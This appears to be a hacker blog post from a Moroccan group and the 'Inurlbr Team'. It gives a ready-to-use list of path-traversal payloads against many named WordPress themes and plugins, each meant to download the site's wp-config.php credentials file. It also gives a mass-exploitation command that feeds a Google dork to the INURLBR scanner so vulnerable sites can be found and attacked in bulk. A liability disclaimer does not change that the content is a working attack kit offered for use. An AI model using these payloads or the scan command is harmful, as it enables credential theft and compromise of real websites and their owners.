Alisam@Technology
https://fb.com/Forces.des.tempetes.marocaines
https://fb.com/Forces.des.tempetes.marocaines
&
Inurlbr Team
[+]=========== Assume NO ============[+]
Liability and are not responsible
for any misuse or damage caused
by this program!!
[+]==================================[+]
USAGE:
Make a file named payload .txt and put inside:
/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
OTHER FAILURES(XPL's):
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
/wp-content/force-download.php?file=../wp-config.php
/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php
/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
/wp-content/themes/markant/download.php?file=../../wp-config.php
/wp-content/themes/yakimabait/download.php?file=./wp-config.php
/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
/wp-content/themes/felis/download.php?file=../wp-config.php
/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php
/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
/wp-content/themes/epic/includes/download.php?file=wp-config.php
/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
/wp-content/themes/lote27/download.php?download=../../../wp-config.php
/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php
/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php
/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php
/wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php
/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php
/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php
EXPLOIT COMMAND:
php inurlbr.php --dork 'inurl:?fdx_switcher=mobile' -q [your favorite engines] -s scan.txt --get-file 'payload.txt' --sub-get --unique
Vídeo:
SCANNER INURLBR:
https://github.com/googleinurl/SCANNER-INURLBR
REF:
https://www.exploit-db.com/exploits/37244/
http://blog.inurl.com.br/2015/04/conceito-de-subprocess-scanner-inurlbr.html
Thank's for any information
ResponderExcluir